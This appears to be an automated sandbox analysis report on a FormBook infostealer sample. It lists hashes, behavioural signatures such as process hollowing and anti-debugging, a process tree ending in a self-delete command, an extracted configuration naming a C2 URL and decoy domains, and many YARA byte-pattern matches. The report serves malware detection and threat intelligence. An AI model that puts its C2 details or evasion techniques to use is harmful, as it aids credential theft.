Edit tour

Windows Analysis Report
S22Ls0H4Sz.exe

Overview

General Information

Sample Name:	S22Ls0H4Sz.exe
Original Sample Name:	24552144f5fb02e6e73e46581a16dfd23eaffa02b90781f34f0b3692cab926d4.exe
Analysis ID:	830328
MD5:	883a36165d45cffa69e01d06532d3958
SHA1:	4034cc0bc72a474fca5204528c658e6f79e0de4b
SHA256:	24552144f5fb02e6e73e46581a16dfd23eaffa02b90781f34f0b3692cab926d4
Tags:	exeFormbook
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Yara detected FormBook

Malicious sample detected (through community Yara rule)

Antivirus / Scanner detection for submitted sample

System process connects to network (likely due to code injection or exploit)

Antivirus detection for URL or domain

Sample uses process hollowing technique

Maps a DLL or memory area into another process

Machine Learning detection for sample

Modifies the prolog of user mode functions (user mode inline hooks)

Queues an APC in another process (thread injection)

Tries to detect virtualization through RDTSC time measurements

Modifies the context of a thread in another process (thread injection)

C2 URLs / IPs found in malware configuration

Uses 32bit PE files

Found decision node followed by non-executed suspicious APIs

Yara signature match

Antivirus or Machine Learning detection for unpacked file

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Internet Provider seen in connection with other malware

Detected potential crypto function

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to call native functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Contains functionality for execution timing, often used to detect debuggers

Enables debug privileges

Creates a DirectInput object (often for capturing keystrokes)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

PE file does not import any functions

Sample file is different than original file name gathered from version info

Contains functionality to read the PEB

Checks if the current process is being debugged

Found large amount of non-executed APIs

Creates a process in suspended mode (likely to inject code)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

System is w10x64

S22Ls0H4Sz.exe (PID: 5492 cmdline: C:\Users\user\Desktop\S22Ls0H4Sz.exe MD5: 883A36165D45CFFA69E01D06532D3958)

explorer.exe (PID: 3320 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)

help.exe (PID: 1068 cmdline: C:\Windows\SysWOW64\help.exe MD5: 09A715036F14D3632AD03B52D1DA6BFF)

cmd.exe (PID: 5212 cmdline: /c del "C:\Users\user\Desktop\S22Ls0H4Sz.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 6076 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://asec.ahnlab.com/en/32149/ https://blog.360totalsecurity.com/en/bayworld-event-cyber-attack-against-foreign-trade-industry/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.573415.com/dr62/"], "decoy": ["juanbrujo.com", "toptasker.africa", "g-labs.one", "1redbuckpermonth.com", "lasolutions.online", "beginagainmen.com", "iearn.site", "leading-car.ru", "codigosindiabetes.fun", "6y8ud.bond", "fptmarket.shop", "ctjhxv3.vip", "huluxia2.xyz", "piggg08.uk", "kms-pico-tools.com", "westonandcate.com", "giftrendz.com", "kqwdhrendfywefdst.top", "anchitchoudhary.com", "sistemodasi.net", "dotcomsolutions.co.uk", "anastaciachetty.com", "czh.ink", "complete-energy-performance.com", "kollanjurarna.se", "anotherdaythelabel.com", "fengkoo.com", "sunsongproductions20.com", "horhog.com", "chq-1.com", "cryptogame.rsvp", "jjzb10a.xyz", "raffletokens.com", "djmikehall.com", "baychocolates.online", "ecoskiusa.com", "myenergyusage.co.uk", "lipcarehub.africa", "isstrainingaz.com", "engagementbuzz.com", "jordanheritagita.online", "cheaphockeysticks.com", "rodeosonline.uk", "access247connect.info", "85putao.com", "josefa.wien", "pilcoh.online", "apothakeehair.com", "danadelseck.com", "dslimme.com", "alacatimacunu.com", "caplesssociety.com", "creativeirishgfts.com", "blografie.com", "hamfoods.com", "ballonstunisie.com", "jingduxueyue.site", "goldoholic.com", "millennialcore.net", "tacairservice.com", "betheme.shop", "bathroadtraders.co.uk", "jas757.com", "crossovers-82617.com"]}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
S22Ls0H4Sz.exe	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
S22Ls0H4Sz.exe	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
S22Ls0H4Sz.exe	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x5651:$a1: 3C 30 50 4F 53 54 74 09 40 0x1bfb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x9dbf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x14ca7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
S22Ls0H4Sz.exe	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8d08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8f72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14aa5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14591:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14ba7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x14d1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x998a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1380c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa683:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1ad17:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1bd1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
S22Ls0H4Sz.exe	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x17c39:$sqlite3step: 68 34 1C 7B E1 0x17d4c:$sqlite3step: 68 34 1C 7B E1 0x17c68:$sqlite3text: 68 38 2A 90 C5 0x17d8d:$sqlite3text: 68 38 2A 90 C5 0x17c7b:$sqlite3blob: 68 53 D8 7F 8C 0x17da3:$sqlite3blob: 68 53 D8 7F 8C

Memory Dumps

Source	Rule	Description	Author	Strings
00000001.00000002.514186613.00000000047C0000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_772cc62d	unknown	unknown	0xa42:$a2: pass 0xa48:$a3: email 0xa4f:$a4: login 0xa56:$a5: signin 0xa67:$a6: persistent 0xc3a:$r1: C:\Users\user\AppData\Roaming\8LMNT35B\8LMlog.ini
00000002.00000002.510580627.00000000031DD000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.510580627.00000000031DD000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000002.00000002.510580627.00000000031DD000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6051:$a1: 3C 30 50 4F 53 54 74 09 40 0x1c9b0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa7bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x156a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000002.00000002.510580627.00000000031DD000.00000004.00000020.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9708:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x154a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14f91:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x155a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1571f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa38a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1420c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb083:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b717:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c71a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000002.00000002.510580627.00000000031DD000.00000004.00000020.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18639:$sqlite3step: 68 34 1C 7B E1 0x1874c:$sqlite3step: 68 34 1C 7B E1 0x18668:$sqlite3text: 68 38 2A 90 C5 0x1878d:$sqlite3text: 68 38 2A 90 C5 0x1867b:$sqlite3blob: 68 53 D8 7F 8C 0x187a3:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000000.243255948.0000000000381000.00000020.00000001.01000000.00000003.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000000.00000000.243255948.0000000000381000.00000020.00000001.01000000.00000003.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000000.00000000.243255948.0000000000381000.00000020.00000001.01000000.00000003.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x5251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1bbb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x99bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x148a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000000.00000000.243255948.0000000000381000.00000020.00000001.01000000.00000003.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x958a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1a917:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1b91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000000.00000000.243255948.0000000000381000.00000020.00000001.01000000.00000003.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x17839:$sqlite3step: 68 34 1C 7B E1 0x1794c:$sqlite3step: 68 34 1C 7B E1 0x17868:$sqlite3text: 68 38 2A 90 C5 0x1798d:$sqlite3text: 68 38 2A 90 C5 0x1787b:$sqlite3blob: 68 53 D8 7F 8C 0x179a3:$sqlite3blob: 68 53 D8 7F 8C
00000002.00000002.510495926.0000000002DC0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.510495926.0000000002DC0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000002.00000002.510495926.0000000002DC0000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000002.00000002.510495926.0000000002DC0000.00000040.80000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000002.00000002.510495926.0000000002DC0000.00000040.80000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18839:$sqlite3step: 68 34 1C 7B E1 0x1894c:$sqlite3step: 68 34 1C 7B E1 0x18868:$sqlite3text: 68 38 2A 90 C5 0x1898d:$sqlite3text: 68 38 2A 90 C5 0x1887b:$sqlite3blob: 68 53 D8 7F 8C 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.283956267.00000000003B0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000000.00000002.283956267.00000000003B0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000000.00000002.283956267.00000000003B0000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000000.00000002.283956267.00000000003B0000.00000040.10000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000000.00000002.283956267.00000000003B0000.00000040.10000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18839:$sqlite3step: 68 34 1C 7B E1 0x1894c:$sqlite3step: 68 34 1C 7B E1 0x18868:$sqlite3text: 68 38 2A 90 C5 0x1898d:$sqlite3text: 68 38 2A 90 C5 0x1887b:$sqlite3blob: 68 53 D8 7F 8C 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.283734451.0000000000381000.00000020.00000001.01000000.00000003.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000000.00000002.283734451.0000000000381000.00000020.00000001.01000000.00000003.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000000.00000002.283734451.0000000000381000.00000020.00000001.01000000.00000003.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x5251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1bbb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x99bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x148a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000000.00000002.283734451.0000000000381000.00000020.00000001.01000000.00000003.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x958a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1a917:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1b91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000000.00000002.283734451.0000000000381000.00000020.00000001.01000000.00000003.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x17839:$sqlite3step: 68 34 1C 7B E1 0x1794c:$sqlite3step: 68 34 1C 7B E1 0x17868:$sqlite3text: 68 38 2A 90 C5 0x1798d:$sqlite3text: 68 38 2A 90 C5 0x1787b:$sqlite3blob: 68 53 D8 7F 8C 0x179a3:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.283263107.0000000000300000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000000.00000002.283263107.0000000000300000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000000.00000002.283263107.0000000000300000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000000.00000002.283263107.0000000000300000.00000040.10000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000000.00000002.283263107.0000000000300000.00000040.10000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18839:$sqlite3step: 68 34 1C 7B E1 0x1894c:$sqlite3step: 68 34 1C 7B E1 0x18868:$sqlite3text: 68 38 2A 90 C5 0x1898d:$sqlite3text: 68 38 2A 90 C5 0x1887b:$sqlite3blob: 68 53 D8 7F 8C 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
00000002.00000002.509959112.0000000000BD0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.509959112.0000000000BD0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000002.00000002.509959112.0000000000BD0000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000002.00000002.509959112.0000000000BD0000.00000004.00000800.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000002.00000002.509959112.0000000000BD0000.00000004.00000800.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18839:$sqlite3step: 68 34 1C 7B E1 0x1894c:$sqlite3step: 68 34 1C 7B E1 0x18868:$sqlite3text: 68 38 2A 90 C5 0x1898d:$sqlite3text: 68 38 2A 90 C5 0x1887b:$sqlite3blob: 68 53 D8 7F 8C 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
00000002.00000002.512081375.0000000003CCF000.00000004.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.512081375.0000000003CCF000.00000004.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000002.00000002.512081375.0000000003CCF000.00000004.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x5e91:$a1: 3C 30 50 4F 53 54 74 09 40 0x1c7f0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa5ff:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x154e7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000002.00000002.512081375.0000000003CCF000.00000004.10000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9548:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x97b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x152e5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14dd1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x153e7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1555f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa1ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1404c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xaec3:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b557:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c55a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000002.00000002.512081375.0000000003CCF000.00000004.10000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18479:$sqlite3step: 68 34 1C 7B E1 0x1858c:$sqlite3step: 68 34 1C 7B E1 0x184a8:$sqlite3text: 68 38 2A 90 C5 0x185cd:$sqlite3text: 68 38 2A 90 C5 0x184bb:$sqlite3blob: 68 53 D8 7F 8C 0x185e3:$sqlite3blob: 68 53 D8 7F 8C
00000002.00000002.510213713.0000000002CC0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.510213713.0000000002CC0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000002.00000002.510213713.0000000002CC0000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000002.00000002.510213713.0000000002CC0000.00000040.10000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000002.00000002.510213713.0000000002CC0000.00000040.10000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18839:$sqlite3step: 68 34 1C 7B E1 0x1894c:$sqlite3step: 68 34 1C 7B E1 0x18868:$sqlite3text: 68 38 2A 90 C5 0x1898d:$sqlite3text: 68 38 2A 90 C5 0x1887b:$sqlite3blob: 68 53 D8 7F 8C 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
00000001.00000002.523897898.00000000137CF000.00000004.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000001.00000002.523897898.00000000137CF000.00000004.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000001.00000002.523897898.00000000137CF000.00000004.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x5e91:$a1: 3C 30 50 4F 53 54 74 09 40 0x1c7f0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa5ff:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x154e7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
